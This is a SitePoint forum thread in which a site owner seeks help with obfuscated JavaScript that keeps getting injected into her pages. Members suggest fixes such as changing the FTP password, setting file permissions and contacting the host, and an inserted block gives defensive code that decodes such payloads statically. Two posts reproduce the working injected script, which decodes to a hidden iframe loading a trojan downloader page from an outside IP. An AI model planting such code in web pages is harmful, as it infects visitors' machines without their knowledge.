  1. #1
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Script included automatically

    My website URL is: http://www.dreamdezigns.com

    It has some script included automatically, which is not in my local files.

    My clients suggest this is a virus, and ask me to scan the local files with antivirus software and upload them.

    But no threat was found in my local files, so some suggest the virus may be on the server and say to ask the webhost for a virus scan.

    The webhost also scanned and they said there is no other virus.

    But my website still has scripts included automatically in the source when viewed in a browser.

    Please suggest a solution.

    Subathra.R

  2. #2
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Hello madam, we too face the same problem... The step we have taken so far is to write-protect the files and re-upload them after cleaning out the included junk piece of code, and to change the FTP password, but it's the least step.

    From the forums I came to understand that form fields have to be properly validated, and that inclusion of any new scripts may also cause this problem. For more details, refer to the link:

    en.wikipedia.org/wiki/Code_injection

    In case you get a better solution, please let me know at gameshah at gmail.com

  3. #3
    SitePoint Guru SSJ's Avatar
    Join Date
    Jan 2007
    Posts
    830
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yes, we can call this code injection, but will you please let me know what kind of script got included?

  4. #4
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    The script included in my site is given below:

    <script>
    <!--
    var d=document,kol=561;
    function O10H4893EBC339B93(H4893EBC339FA4){ function H4893EBC33A3A1() {return 16;} return( parseInt(H4893EBC339FA4,H4893EBC33A3A1()));}function H4893EBC33AB9D(H4893EBC33AF94){ var H4893EBC33B390='';for(H4893EBC33BBA3=0; H4893EBC33BBA3<H4893EBC33AF94.length; H4893EBC33BBA3+=2){ H4893EBC33B390 += ( String.fromCharCode (O10H4893EBC339B93(H4893EBC33AF94.substr(H4893EBC33BBA3, 2))));}return H4893EBC33B390;} document.write(H4893EBC33AB9D('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313238363232292B2732356263386639635C272077696474683D323931206865696768743D343432207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    </script>

    It was becoming a very big problem for my site.

    Subathra.R
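
Static decoding of a snippet like the one posted above, as an added example that is not part of the original thread: it recovers the hex-encoded payload without executing it and reports any iframe the payload would write. The sample input is constructed in the same shape as the posted script, with the documentation address 192.0.2.10 standing in for the real host, and all function names are hypothetical.

```javascript
// Added example: decode a hex-obfuscated document.write() injection statically.
// Nothing from the sample is ever evaluated; it is only parsed as text.

// Long, even-length hex string literals are the likely encoded payloads.
function findHexLiterals(source, minLen = 40) {
  const re = /(['"])((?:[0-9A-Fa-f]{2})+)\1/g;
  return [...source.matchAll(re)].map(m => m[2]).filter(h => h.length >= minLen);
}

// Two hex digits per character, mirroring the parseInt(x, 16) helper in the post.
function hexDecode(hex) {
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Report every <iframe> the decoded text would write: source URL, host, hidden?
function findIframes(decoded) {
  const frames = [];
  for (const [tag] of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
    const src = /src\s*=\s*\\?['"]?([^\s'"\\>]+)/i.exec(tag);
    if (!src) continue;
    let host = null;
    try { host = new URL(src[1]).host; } catch (e) { /* relative or malformed */ }
    frames.push({ url: src[1], host, hidden: /display\s*:\s*none/i.test(tag) });
  }
  return frames;
}

function analyzeInjection(source) {
  return findHexLiterals(source).flatMap(h => findIframes(hexDecode(h)));
}

// Constructed sample (not the posted payload): same structure, placeholder host.
const inner = "<script>if(!myia){d.write('<IFRAME name=O1 " +
  "src=\\'http://192.0.2.10/.if/go.html?'+Math.round(Math.random()*1000)+'7\\' " +
  "width=291 height=442 style=\\'display: none\\'></IFRAME >');}" +
  "var myia=true;</script>";
const hex = [...inner].map(c => c.charCodeAt(0).toString(16).padStart(2, '0'))
  .join('').toUpperCase();
const SAMPLE = "<script>document.write(dec('" + hex + "'));</script>";

console.log(analyzeInjection(SAMPLE));
```

Run over a saved copy of the page source, `analyzeInjection` gives the host to report to the web host and to search for in the server's access and FTP logs.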

  5. #5
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    FYI, when your site is visited, it reports the virus name as Trojan-Downloader.JS.Agent.ciw

  6. #6
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Report this virus name to your webhost so they can take further steps from their side.

  7. #7
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Oh...

    But I didn't get any virus notification.

    How do I get rid of this virus?

    Please suggest.

    Subathra.R

  8. #8
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Please refer to the link:

    http://www.f-secure.com/v-descs/troj..._agent_d.shtml

    Method 1
    It describes the method to remove the malware. I hope this method lets you clean up if your system is infected with malware. But if, after performing this step, F-Secure does not find any malware on your system, then report the name of the malware to your ISP.

    Method 2
    Replace the online files with backup files that are free from the script you have mentioned below. Also, I see in the source of your index page there is an attribute called content="LXHLASJDFLJKAKL." or something like that. If that's not necessary, remove that too.

    Anyway, do not fail to inform your ISP of this to get their suggestion.

  9. #9
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Also refer to this link... It must be useful in solving this issue.

  10. #10
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

  11. #11
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I am still getting the script included automatically.

    I asked the webhost about the virus you mentioned, but they scanned the files and said there is no other virus on the server.

    In the local files also I wasn't notified of that virus.

    So what shall I do?

    I am not well versed in PHP.

    Subathra.R

  12. #12
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Now I checked your site on 2 of the systems here. I did not receive any pop-ups as before. Could you clear your private data, cookies, temp files etc. and try once more?
    As far as I checked in your View > Source, I couldn't find the above-mentioned code posted by you. Could you copy and paste the full source as you find it once again?

    Another option is to subscribe at www.expertsexchange.com to find a solution. Since it's a paid service (but affordable) there would be an active response provided; you need to search for a problem similar to the one you face.

  13. #13
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Oops, the link is www.experts-exchange.com

  14. #14
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Oh... it's a pleasure... there is no virus...

    But I uploaded the index page without that script this morning, so that may be the reason the source doesn't have the script.

    Yesterday I also did the same, but in the evening the source was included automatically.

    We have to wait for some time; if the script is not included, it's good.
    Otherwise I have to do something else.

    Subathra.R

  15. #15
    secure webapps for all Aleksejs's Avatar
    Join Date
    Apr 2008
    Location
    Riga, Latvia
    Posts
    755
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hi, subathraramasami!
    So what I gather from what you have told us is that:
    you contacted the hosting provider and they said everything is fine;
    you uploaded a fresh index.php and that is it.

    You have not found out how your files got infected with that virus. You are still at risk, though, because that trojan could infect you again. You should find out how/why that was possible.

  16. #16
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hey, again I got that script included automatically.

    <script>
    <!--
    var d=document,kol=561;
    function O10H4898E45C60F4D(H4898E45C61745){ function H4898E45C61F48() {return 16;} return( parseInt(H4898E45C61745,H4898E45C61F48()));}function H4898E45C62B23(H4898E45C62F1A){ function H4898E45C63B10() {return 2;} var H4898E45C63316='';for(H4898E45C63717=0; H4898E45C63717<H4898E45C62F1A.length; H4898E45C63717+=H4898E45C63B10()){ H4898E45C63316 += ( String.fromCharCode (O10H4898E45C60F4D(H4898E45C62F1A.substr(H4898E45C63717, H4898E45C63B10()))));}return H4898E45C63316;} document.write(H4898E45C62B23('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323538393038292B27375C272077696474683D363736206865696768743D333833207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    </script>

    And you said that the trojan can again infect the site.

    I still don't know the reason for what is happening.

    Day by day it's becoming a very big problem for me.

    Subathra.R

  17. #17
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Show this attached image to your web hosting provider as proof that the site has a malware script. Let's see what they say. And have you changed your FTP password, write-protected the HTML files and re-uploaded them?

  18. #18
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yes, I changed the FTP password and I set the chmod to 755 only.

    And I'll also send that screenshot you sent to my webhost and see.

    Subathra.R

  19. #19
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I have sent one private message. Please check that too.

  20. #20
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yes, I saw that...

    Thank you very much

    Subathra.R

  21. #21
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    And also, is the write permission 755 OK?

    If not, what would be the best chmod?

    Subathra.R

  22. #22
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    As of now, no idea on that. If the problem persists, then we shall think of tightening the write permission further...

  23. #23
    SitePoint Member
    Join Date
    Aug 2008
    Posts
    8
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Which browser are you using? Which virus scanner?
    I tried your site with Firefox 2.0.x and AVG 8.0 Free and it looks great. It could be a combination of these things. Are you using a visual PHP editor?

    There are too many factors in it.

  24. #24
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    OK stylesha, thanks. We will wait and see the response for write protection.

    Hi jkuiper,

    I uploaded all the files just now, so it may not show any virus notification.

    The browser used is IE 6.

    Please see the earlier reply sent by stylesha with the virus notification thumbnail.

    I didn't use any PHP editors.

    Subathra.R

  25. #25
    SitePoint Member
    Join Date
    Aug 2008
    Posts
    8
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Of course I read all the replies before I answered.
    But as I say, there are many factors to it.
    I also tested your site with IE7 without problems. I also can't reproduce your problem here.

    So my question is still here. Test your website with another browser.
    If you run your site locally, do you still have that problem? If so, it's really a problem with your provider, as stylesha told you.

    Look further and do not focus on one point, in my opinion.

